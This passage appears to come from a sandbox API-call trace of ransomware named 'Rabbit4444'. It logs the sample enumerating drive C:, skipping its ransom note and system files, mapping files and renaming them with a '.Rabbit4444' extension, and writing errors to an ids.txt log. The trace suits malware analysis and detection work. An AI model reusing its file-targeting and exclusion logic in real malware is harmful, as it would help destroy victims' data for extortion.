lpString1="$GetCurrent") returned="$GetCurrent" [0042.974] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf65e8 [0042.974] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x1e) returned 0xff658 [0042.974] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf65f0 | out: ListHead=0xf68b0, ListEntry=0xf65f0) returned 0x0 [0042.974] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0042.974] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.975] lstrcmpiW (lpString1="$Recycle.Bin", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0042.975] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Rabbit4444.exe") returned -1 [0042.975] lstrcmpiW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0042.975] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0042.975] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="windows") returned -1 [0042.975] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="bootmgr") returned -1 [0042.975] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="pagefile.sys") returned -1 [0042.975] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="boot") returned -1 [0042.975] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="ids.txt") returned -1 [0042.975] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="NTUSER.DAT") returned -1 [0042.975] lstrcpyW (in: lpString1=0x130eb3e, lpString2="$Recycle.Bin" | out: lpString1="$Recycle.Bin") returned="$Recycle.Bin" [0042.975] SetFileAttributesW (lpFileName="C:\\$Recycle.Bin", dwFileAttributes=0x12) returned 1 [0042.975] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64e8 [0042.975] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x20) returned 0xff720 [0042.975] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64f0 | out: ListHead=0xf68b0, ListEntry=0xf64f0) returned 0xf65f0 [0042.975] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0042.975] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.975] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0042.975] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="Rabbit4444.exe") returned -1 [0042.975] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2=".") returned -1 [0042.975] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="..") returned -1 [0042.975] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="windows") returned -1 [0042.975] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="bootmgr") returned -1 [0042.975] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="pagefile.sys") returned -1 [0042.976] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="boot") returned -1 [0042.976] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="ids.txt") returned -1 [0042.976] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="NTUSER.DAT") returned -1 [0042.976] lstrcpyW (in: lpString1=0x130eb3e, lpString2="$WINRE_BACKUP_PARTITION.MARKER" | out: lpString1="$WINRE_BACKUP_PARTITION.MARKER") returned="$WINRE_BACKUP_PARTITION.MARKER" [0042.976] SetFileAttributesW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER", dwFileAttributes=0x2) returned 1 [0042.976] lstrlenW (lpString="$WINRE_BACKUP_PARTITION.MARKER") returned 30 [0042.976] lstrlenW (lpString="Rabbit4444") returned 10 [0042.976] lstrcmpiW (lpString1="ION.MARKER", lpString2="Rabbit4444") returned -1 [0042.976] lstrlenW (lpString=".dll") returned 4 [0042.976] lstrcmpiW (lpString1="RKER", lpString2=".dll") returned 1 [0042.977] lstrlenW (lpString=".lnk") returned 4 [0042.977] lstrcmpiW (lpString1="RKER", lpString2=".lnk") returned 1 [0042.977] lstrlenW (lpString=".ini") returned 4 [0042.977] lstrcmpiW (lpString1="RKER", lpString2=".ini") returned 1 [0042.977] lstrlenW (lpString=".sys") returned 4 [0042.977] lstrcmpiW (lpString1="RKER", lpString2=".sys") returned 1 [0042.977] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe2eebc77, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe2eebc77, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe2eebc77, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0042.977] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.977] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0042.977] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0042.977] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.977] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0042.977] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Rabbit4444.exe") returned -1 [0042.977] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2=".") returned 1 [0042.977] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="..") returned 1 [0042.977] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="windows") returned -1 [0042.977] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="bootmgr") returned -1 [0042.977] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="pagefile.sys") returned -1 [0042.977] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="boot") returned -1 [0042.977] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="ids.txt") returned -1 [0042.977] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="NTUSER.DAT") returned -1 [0042.977] lstrcpyW (in: lpString1=0x130eb3e, lpString2="588bce7c90097ed212" | out: lpString1="588bce7c90097ed212") returned="588bce7c90097ed212" [0042.977] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6688 [0042.977] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x2c) returned 0xf7728 [0042.977] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6690 | out: ListHead=0xf68b0, ListEntry=0xf6690) returned 0xf64f0 [0042.977] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0042.977] lstrcmpiW (lpString1="Boot", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.977] lstrcmpiW (lpString1="Boot", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0042.977] lstrcmpiW (lpString1="Boot", lpString2="Rabbit4444.exe") returned -1 [0042.977] lstrcmpiW (lpString1="Boot", lpString2=".") returned 1 [0042.977] lstrcmpiW (lpString1="Boot", lpString2="..") returned 1 [0042.977] lstrcmpiW (lpString1="Boot", lpString2="windows") returned -1 [0042.978] lstrcmpiW (lpString1="Boot", lpString2="bootmgr") returned -1 [0042.978] lstrcmpiW (lpString1="Boot", lpString2="pagefile.sys") returned -1 [0042.978] lstrcmpiW (lpString1="Boot", lpString2="boot") returned 0 [0042.978] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0042.978] lstrcmpiW (lpString1="bootmgr", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.978] lstrcmpiW (lpString1="bootmgr", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0042.978] lstrcmpiW (lpString1="bootmgr", lpString2="Rabbit4444.exe") returned -1 [0042.978] lstrcmpiW (lpString1="bootmgr", lpString2=".") returned 1 [0042.978] lstrcmpiW (lpString1="bootmgr", lpString2="..") returned 1 [0042.978] lstrcmpiW (lpString1="bootmgr", lpString2="windows") returned -1 [0042.978] lstrcmpiW (lpString1="bootmgr", lpString2="bootmgr") returned 0 [0042.978] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0042.978] lstrcmpiW (lpString1="BOOTNXT", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.978] lstrcmpiW (lpString1="BOOTNXT", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0042.978] lstrcmpiW (lpString1="BOOTNXT", lpString2="Rabbit4444.exe") returned -1 [0042.978] lstrcmpiW (lpString1="BOOTNXT", lpString2=".") returned 1 [0042.978] lstrcmpiW (lpString1="BOOTNXT", lpString2="..") returned 1 [0042.978] lstrcmpiW (lpString1="BOOTNXT", lpString2="windows") returned -1 [0042.978] lstrcmpiW (lpString1="BOOTNXT", lpString2="bootmgr") returned 1 [0042.978] lstrcmpiW (lpString1="BOOTNXT", lpString2="pagefile.sys") returned -1 [0042.978] lstrcmpiW (lpString1="BOOTNXT", lpString2="boot") returned 1 [0042.978] lstrcmpiW (lpString1="BOOTNXT", lpString2="ids.txt") returned -1 [0042.978] lstrcmpiW (lpString1="BOOTNXT", lpString2="NTUSER.DAT") returned -1 [0042.978] lstrcpyW (in: lpString1=0x130eb3e, lpString2="BOOTNXT" | out: lpString1="BOOTNXT") returned="BOOTNXT" [0042.978] SetFileAttributesW (lpFileName="C:\\BOOTNXT", dwFileAttributes=0x22) returned 1 [0042.980] SetFileAttributesW (lpFileName="C:\\BOOTNXT", dwFileAttributes=0x6) returned 1 [0042.980] lstrlenW (lpString="BOOTNXT") returned 7 [0042.980] lstrlenW (lpString="Rabbit4444") returned 10 [0042.980] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0042.980] lstrlenW (lpString=".dll") returned 4 [0042.980] lstrcmpiW (lpString1="TNXT", lpString2=".dll") returned 1 [0042.980] lstrlenW (lpString=".lnk") returned 4 [0042.980] lstrcmpiW (lpString1="TNXT", lpString2=".lnk") returned 1 [0042.980] lstrlenW (lpString=".ini") returned 4 [0042.980] lstrcmpiW (lpString1="TNXT", lpString2=".ini") returned 1 [0042.980] lstrlenW (lpString=".sys") returned 4 [0042.980] lstrcmpiW (lpString1="TNXT", lpString2=".sys") returned 1 [0042.980] CreateFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0042.980] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0042.980] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13429109234) returned 1 [0042.980] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1) returned 1 [0042.980] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0xfc9e8 [0042.981] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0042.981] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x27c [0042.984] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x70000 [0042.990] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xe6ed8 [0042.990] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0042.990] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xe6ed8 | out: hHeap=0xe0000) returned 1 [0042.990] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0042.990] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10ed48 [0042.991] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0042.991] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10ed48 | out: hHeap=0xe0000) returned 1 [0042.991] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0042.991] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13430152222) returned 1 [0042.991] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfc9e8 | out: hHeap=0xe0000) returned 1 [0042.991] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0042.991] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0042.991] CloseHandle (hObject=0x27c) returned 1 [0042.991] CloseHandle (hObject=0x278) returned 1 [0042.993] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\BOOTNXT.Rabbit4444") returned 21 [0042.993] MoveFileExW (lpExistingFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), lpNewFileName="C:\\BOOTNXT.Rabbit4444" (normalized: "c:\\bootnxt.rabbit4444"), dwFlags=0x1) returned 1 [0042.993] InterlockedExchangeAdd (in: Addend=0xff618, Value=16 | out: Addend=0xff618) returned 0 [0042.993] InterlockedExchangeAdd (in: Addend=0xff624, Value=10 | out: Addend=0xff624) returned 0 [0042.993] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xc4ee267e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4ee267e, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xf1c63cdd, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0042.993] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.993] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0042.993] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Rabbit4444.exe") returned -1 [0042.993] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".") returned 1 [0042.993] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="..") returned 1 [0042.993] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="windows") returned -1 [0042.993] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="bootmgr") returned 1 [0042.993] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="pagefile.sys") returned -1 [0042.993] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="boot") returned 1 [0042.993] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="ids.txt") returned -1 [0042.993] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="NTUSER.DAT") returned -1 [0042.993] lstrcpyW (in: lpString1=0x130eb3e, lpString2="BOOTSECT.BAK" | out: lpString1="BOOTSECT.BAK") returned="BOOTSECT.BAK" [0042.994] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0042.994] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x23) returned 1 [0042.994] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x7) returned 1 [0042.994] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0042.994] lstrlenW (lpString="Rabbit4444") returned 10 [0042.994] lstrcmpiW (lpString1="OTSECT.BAK", lpString2="Rabbit4444") returned -1 [0042.994] lstrlenW (lpString=".dll") returned 4 [0042.994] lstrcmpiW (lpString1=".BAK", lpString2=".dll") returned -1 [0042.994] lstrlenW (lpString=".lnk") returned 4 [0042.994] lstrcmpiW (lpString1=".BAK", lpString2=".lnk") returned -1 [0042.994] lstrlenW (lpString=".ini") returned 4 [0042.994] lstrcmpiW (lpString1=".BAK", lpString2=".ini") returned -1 [0042.994] lstrlenW (lpString=".sys") returned 4 [0042.994] lstrcmpiW (lpString1=".BAK", lpString2=".sys") returned -1 [0042.994] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0042.995] GetLastError () returned 0x5 [0042.995] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\BOOTSECT.BAK _CreateFile error 5\r\n") returned 45 [0042.995] lstrlenA (lpString="[ERROR] C:\\BOOTSECT.BAK _CreateFile error 5\r\n") returned 45 [0042.995] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0042.995] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x42a [0042.995] WriteFile (in: hFile=0x278, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x2d, lpOverlapped=0x0) returned 1 [0042.996] CloseHandle (hObject=0x278) returned 1 [0042.997] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0042.997] CloseHandle (hObject=0x0) returned 0 [0042.997] CloseHandle (hObject=0xffffffff) returned 1 [0042.997] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0042.997] lstrcmpiW (lpString1="Documents and Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.997] lstrcmpiW (lpString1="Documents and Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0042.997] lstrcmpiW (lpString1="Documents and Settings", lpString2="Rabbit4444.exe") returned -1 [0042.997] lstrcmpiW (lpString1="Documents and Settings", lpString2=".") returned 1 [0042.997] lstrcmpiW (lpString1="Documents and Settings", lpString2="..") returned 1 [0042.998] lstrcmpiW (lpString1="Documents and Settings", lpString2="windows") returned -1 [0042.998] lstrcmpiW (lpString1="Documents and Settings", lpString2="bootmgr") returned 1 [0042.998] lstrcmpiW (lpString1="Documents and Settings", lpString2="pagefile.sys") returned -1 [0042.998] lstrcmpiW (lpString1="Documents and Settings", lpString2="boot") returned 1 [0042.998] lstrcmpiW (lpString1="Documents and Settings", lpString2="ids.txt") returned -1 [0042.998] lstrcmpiW (lpString1="Documents and Settings", lpString2="NTUSER.DAT") returned -1 [0042.998] lstrcpyW (in: lpString1=0x130eb3e, lpString2="Documents and Settings" | out: lpString1="Documents and Settings") returned="Documents and Settings" [0042.998] SetFileAttributesW (lpFileName="C:\\Documents and Settings", dwFileAttributes=0x2412) returned 1 [0042.999] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Documents and Settings\r\n") returned 44 [0042.999] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Documents and Settings\r\n") returned 44 [0042.999] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0042.999] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x457 [0042.999] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x2c, lpOverlapped=0x0) returned 1 [0043.000] CloseHandle (hObject=0x278) returned 1 [0043.001] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0043.001] lstrcmpiW (lpString1="ESD", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.001] lstrcmpiW (lpString1="ESD", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.001] lstrcmpiW (lpString1="ESD", lpString2="Rabbit4444.exe") returned -1 [0043.001] lstrcmpiW (lpString1="ESD", lpString2=".") returned 1 [0043.001] lstrcmpiW (lpString1="ESD", lpString2="..") returned 1 [0043.001] lstrcmpiW (lpString1="ESD", lpString2="windows") returned -1 [0043.001] lstrcmpiW (lpString1="ESD", lpString2="bootmgr") returned 1 [0043.001] lstrcmpiW (lpString1="ESD", lpString2="pagefile.sys") returned -1 [0043.001] lstrcmpiW (lpString1="ESD", lpString2="boot") returned 1 [0043.001] lstrcmpiW (lpString1="ESD", lpString2="ids.txt") returned -1 [0043.001] lstrcmpiW (lpString1="ESD", lpString2="NTUSER.DAT") returned -1 [0043.001] lstrcpyW (in: lpString1=0x130eb3e, lpString2="ESD" | out: lpString1="ESD") returned="ESD" [0043.001] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6648 [0043.001] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xe) returned 0x103bc0 [0043.001] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6650 | out: ListHead=0xf68b0, ListEntry=0xf6650) returned 0xf6690 [0043.001] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3d7ebe9, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0043.001] lstrcmpiW (lpString1="hiberfil.sys", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.001] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.001] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Rabbit4444.exe") returned -1 [0043.002] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".") returned 1 [0043.002] lstrcmpiW (lpString1="hiberfil.sys", lpString2="..") returned 1 [0043.002] lstrcmpiW (lpString1="hiberfil.sys", lpString2="windows") returned -1 [0043.002] lstrcmpiW (lpString1="hiberfil.sys", lpString2="bootmgr") returned 1 [0043.002] lstrcmpiW (lpString1="hiberfil.sys", lpString2="pagefile.sys") returned -1 [0043.002] lstrcmpiW (lpString1="hiberfil.sys", lpString2="boot") returned 1 [0043.002] lstrcmpiW (lpString1="hiberfil.sys", lpString2="ids.txt") returned -1 [0043.002] lstrcmpiW (lpString1="hiberfil.sys", lpString2="NTUSER.DAT") returned -1 [0043.002] lstrcpyW (in: lpString1=0x130eb3e, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0043.002] SetFileAttributesW (lpFileName="C:\\hiberfil.sys", dwFileAttributes=0x2022) returned 0 [0043.002] SetFileAttributesW (lpFileName="C:\\hiberfil.sys", dwFileAttributes=0x2006) returned 0 [0043.002] lstrlenW (lpString="hiberfil.sys") returned 12 [0043.002] lstrlenW (lpString="Rabbit4444") returned 10 [0043.002] lstrcmpiW (lpString1="berfil.sys", lpString2="Rabbit4444") returned -1 [0043.002] lstrlenW (lpString=".dll") returned 4 